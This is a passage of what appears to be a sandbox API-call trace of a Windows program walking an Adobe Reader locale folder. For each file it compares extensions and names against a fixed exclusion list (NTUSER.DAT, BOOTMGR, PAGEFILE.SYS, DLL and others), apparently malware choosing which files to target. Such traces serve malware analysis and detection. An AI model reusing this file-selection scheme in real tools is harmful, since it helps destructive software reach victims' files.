cchCount2=3) returned 1 [0058.535] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.535] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="NLD", cchCount2=3) returned 3 [0058.535] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="NLD", cchCount2=3) returned 3 [0058.535] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="NLD", cchCount2=3) returned 3 [0058.535] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="NLD", cchCount2=3) returned 1 [0058.535] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.535] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="NLD", cchCount2=3) returned 1 [0058.535] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="NLD", cchCount2=3) returned 1 [0058.536] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="READOUTLOUD.NLD", cchCount2=15) returned 1 [0058.536] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="READOUTLOUD.NLD", cchCount2=15) returned 1 [0058.536] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="READOUTLOUD.NLD", cchCount2=15) returned 1 [0058.536] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="READOUTLOUD.NLD", cchCount2=15) returned 1 [0058.536] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="READOUTLOUD.NLD", cchCount2=15) returned 1 [0058.536] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="READOUTLOUD.NLD", cchCount2=15) returned 1 [0058.536] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="READOUTLOUD.NLD", cchCount2=15) returned 3 [0058.536] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="READOUTLOUD.NLD", cchCount2=15) returned 1 [0058.536] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="READOUTLOUD.NLD", cchCount2=15) returned 1 [0058.536] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="READOUTLOUD.NLD", cchCount2=15) returned 1 [0058.536] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="READOUTLOUD.NLD", cchCount2=15) returned 1 [0058.536] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="READOUTLOUD.NLD", cchCount2=15) returned 1 [0058.536] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="READOUTLOUD.NLD", cchCount2=15) returned 3 [0058.536] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="READOUTLOUD.NLD", cchCount2=15) returned 3 [0058.536] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d984a20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0x0, dwReserved1=0x0, cFileName="reflow.NLD", cAlternateFileName="")) returned 1 [0058.536] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="NLD", cchCount2=3) returned 1 [0058.536] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.536] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.537] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="NLD", cchCount2=3) returned 1 [0058.537] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.537] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.537] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.537] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="NLD", cchCount2=3) returned 1 [0058.537] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="NLD", cchCount2=3) returned 1 [0058.537] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="NLD", cchCount2=3) returned 1 [0058.537] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.537] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="NLD", cchCount2=3) returned 3 [0058.537] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="NLD", cchCount2=3) returned 3 [0058.537] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="NLD", cchCount2=3) returned 3 [0058.537] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="NLD", cchCount2=3) returned 1 [0058.537] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.537] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="NLD", cchCount2=3) returned 1 [0058.537] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="NLD", cchCount2=3) returned 1 [0058.537] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="REFLOW.NLD", cchCount2=10) returned 1 [0058.537] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="REFLOW.NLD", cchCount2=10) returned 1 [0058.537] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="REFLOW.NLD", cchCount2=10) returned 1 [0058.537] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="REFLOW.NLD", cchCount2=10) returned 1 [0058.537] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="REFLOW.NLD", cchCount2=10) returned 1 [0058.538] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="REFLOW.NLD", cchCount2=10) returned 1 [0058.538] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="REFLOW.NLD", cchCount2=10) returned 3 [0058.538] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="REFLOW.NLD", cchCount2=10) returned 1 [0058.538] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="REFLOW.NLD", cchCount2=10) returned 1 [0058.538] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="REFLOW.NLD", cchCount2=10) returned 1 [0058.538] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="REFLOW.NLD", cchCount2=10) returned 1 [0058.538] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="REFLOW.NLD", cchCount2=10) returned 1 [0058.538] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="REFLOW.NLD", cchCount2=10) returned 3 [0058.538] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="REFLOW.NLD", cchCount2=10) returned 3 [0058.538] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7dab5520, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="SaveAsRTF.NLD", cAlternateFileName="SAVEAS~1.NLD")) returned 1 [0058.538] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="NLD", cchCount2=3) returned 1 [0058.538] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.538] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.539] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="NLD", cchCount2=3) returned 1 [0058.539] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.539] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.539] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.539] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="NLD", cchCount2=3) returned 1 [0058.539] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="NLD", cchCount2=3) returned 1 [0058.539] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="NLD", cchCount2=3) returned 1 [0058.539] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.539] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="NLD", cchCount2=3) returned 3 [0058.539] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="NLD", cchCount2=3) returned 3 [0058.539] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="NLD", cchCount2=3) returned 3 [0058.539] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="NLD", cchCount2=3) returned 1 [0058.539] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.539] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="NLD", cchCount2=3) returned 1 [0058.539] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="NLD", cchCount2=3) returned 1 [0058.539] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="SAVEASRTF.NLD", cchCount2=13) returned 1 [0058.539] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="SAVEASRTF.NLD", cchCount2=13) returned 1 [0058.540] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="SAVEASRTF.NLD", cchCount2=13) returned 1 [0058.540] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="SAVEASRTF.NLD", cchCount2=13) returned 1 [0058.540] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="SAVEASRTF.NLD", cchCount2=13) returned 1 [0058.540] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="SAVEASRTF.NLD", cchCount2=13) returned 1 [0058.540] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="SAVEASRTF.NLD", cchCount2=13) returned 3 [0058.540] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="SAVEASRTF.NLD", cchCount2=13) returned 1 [0058.540] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="SAVEASRTF.NLD", cchCount2=13) returned 1 [0058.540] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="SAVEASRTF.NLD", cchCount2=13) returned 1 [0058.540] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="SAVEASRTF.NLD", cchCount2=13) returned 1 [0058.540] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="SAVEASRTF.NLD", cchCount2=13) returned 1 [0058.540] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="SAVEASRTF.NLD", cchCount2=13) returned 3 [0058.540] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="SAVEASRTF.NLD", cchCount2=13) returned 3 [0058.540] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82cfad80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Search.NLD", cAlternateFileName="")) returned 1 [0058.540] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="NLD", cchCount2=3) returned 1 [0058.540] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.541] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.541] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="NLD", cchCount2=3) returned 1 [0058.541] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.541] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.541] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.541] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="NLD", cchCount2=3) returned 1 [0058.541] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="NLD", cchCount2=3) returned 1 [0058.541] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="NLD", cchCount2=3) returned 1 [0058.541] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.541] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="NLD", cchCount2=3) returned 3 [0058.541] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="NLD", cchCount2=3) returned 3 [0058.541] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="NLD", cchCount2=3) returned 3 [0058.541] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="NLD", cchCount2=3) returned 1 [0058.541] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.541] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="NLD", cchCount2=3) returned 1 [0058.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="NLD", cchCount2=3) returned 1 [0058.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="SEARCH.NLD", cchCount2=10) returned 1 [0058.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="SEARCH.NLD", cchCount2=10) returned 1 [0058.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="SEARCH.NLD", cchCount2=10) returned 1 [0058.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="SEARCH.NLD", cchCount2=10) returned 1 [0058.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="SEARCH.NLD", cchCount2=10) returned 1 [0058.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="SEARCH.NLD", cchCount2=10) returned 1 [0058.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="SEARCH.NLD", cchCount2=10) returned 3 [0058.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="SEARCH.NLD", cchCount2=10) returned 1 [0058.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="SEARCH.NLD", cchCount2=10) returned 1 [0058.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="SEARCH.NLD", cchCount2=10) returned 1 [0058.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="SEARCH.NLD", cchCount2=10) returned 1 [0058.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="SEARCH.NLD", cchCount2=10) returned 1 [0058.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="SEARCH.NLD", cchCount2=10) returned 3 [0058.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="SEARCH.NLD", cchCount2=10) returned 3 [0058.543] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82cfad80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="SendMail.NLD", cAlternateFileName="")) returned 1 [0058.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="NLD", cchCount2=3) returned 1 [0058.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="NLD", cchCount2=3) returned 1 [0058.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="NLD", cchCount2=3) returned 1 [0058.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="NLD", cchCount2=3) returned 1 [0058.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="NLD", cchCount2=3) returned 1 [0058.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="NLD", cchCount2=3) returned 3 [0058.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="NLD", cchCount2=3) returned 3 [0058.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="NLD", cchCount2=3) returned 3 [0058.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="NLD", cchCount2=3) returned 1 [0058.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="NLD", cchCount2=3) returned 3 [0058.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="NLD", cchCount2=3) returned 1 [0058.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="NLD", cchCount2=3) returned 1 [0058.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="SENDMAIL.NLD", cchCount2=12) returned 1 [0058.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="SENDMAIL.NLD", cchCount2=12) returned 1 [0058.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="SENDMAIL.NLD", cchCount2=12) returned 1 [0058.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="SENDMAIL.NLD", cchCount2=12) returned 1 [0058.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="SENDMAIL.NLD", cchCount2=12) returned 1 [0058.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="SENDMAIL.NLD", cchCount2=12) returned 1 [0058.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="SENDMAIL.NLD", cchCount2=12) returned 3 [0058.545] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f4af00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81fbd320, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81fbd320, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0058.546] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Services\\*.*", lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f4af00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81fbd320, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81fbd320, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa40 [0058.547] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f4af00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81fbd320, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81fbd320, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.547] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81fbd320, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x924e, dwReserved0=0x0, dwReserved1=0x0, cFileName="DEXShare.asfx", cAlternateFileName="DEXSHA~1.ASF")) returned 1 [0058.547] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81f71060, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services.asfx", cAlternateFileName="SERVIC~1.ASF")) returned 1 [0058.547] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81f71060, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services.asfx", cAlternateFileName="SERVIC~1.ASF")) returned 0 [0058.547] FindClose (in: hFindFile=0x69aa40 | out: hFindFile=0x69aa40) returned 1 [0058.547] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ddfb360, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, 